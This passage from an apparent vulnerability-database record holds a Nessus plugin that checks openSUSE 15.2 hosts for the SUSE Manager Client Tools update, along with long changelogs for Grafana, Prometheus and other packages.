7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1148177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172462\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected SUSE Manager Client Tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dracut-saltboot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dracut-saltboot\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:dracut-saltboot"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-07-31T03:51:42", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "abd654ba5c039010689c0c1616d875cb41e3b37f2e25028778aa96e5b8624e6f", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n ", "published": "2020-07-28T00:00:00", "modified": "2020-07-28T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 8.2, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "immutableFields": [], "lastseen": "2020-08-14T11:53:07", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2020-08-14T11:53:07", "references": [{"idList": ["REDHAT-RHSA-2020-2676.NASL", "OPENSUSE-2020-892.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "FEDORA_2019-0BB6B876DA.NASL", "FEDORA_2019-77D612EAB4.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL", "FEDORA_2020-E6E81A03D6.NASL", "REDHAT-RHSA-2020-2641.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-34640"], "type": "zdt"}, {"idList": ["OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1"], "type": "suse"}, {"idList": ["ELSA-2020-5726", "ELSA-2020-2641", "ELSA-2020-1659"], "type": "oraclelinux"}, {"idList": ["SMNTC-110352"], "type": "symantec"}, {"idList": ["RHSA-2020:2792", "RHSA-2020:2641", "RHSA-2020:2861", "RHSA-2020:2796", "RHSA-2020:2676", "RHSA-2020:1659", "RHSA-2019:3771"], "type": "redhat"}, {"idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310877964"], "type": "openvas"}, {"idList": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "type": "cve"}, {"idList": ["EDB-ID:48638"], "type": "exploitdb"}, {"idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"], "type": "avleonov"}, {"idList": ["PACKETSTORM:158320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-08-14T11:53:07", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "139022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1105.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139022);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2019-10215\", \"CVE-2019-15043\", \"CVE-2020-12245\", \"CVE-2020-13379\");\n\n script_name(english:\"openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)\");\n script_summary(english:\"Check for the openSUSE-2020-1105 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. 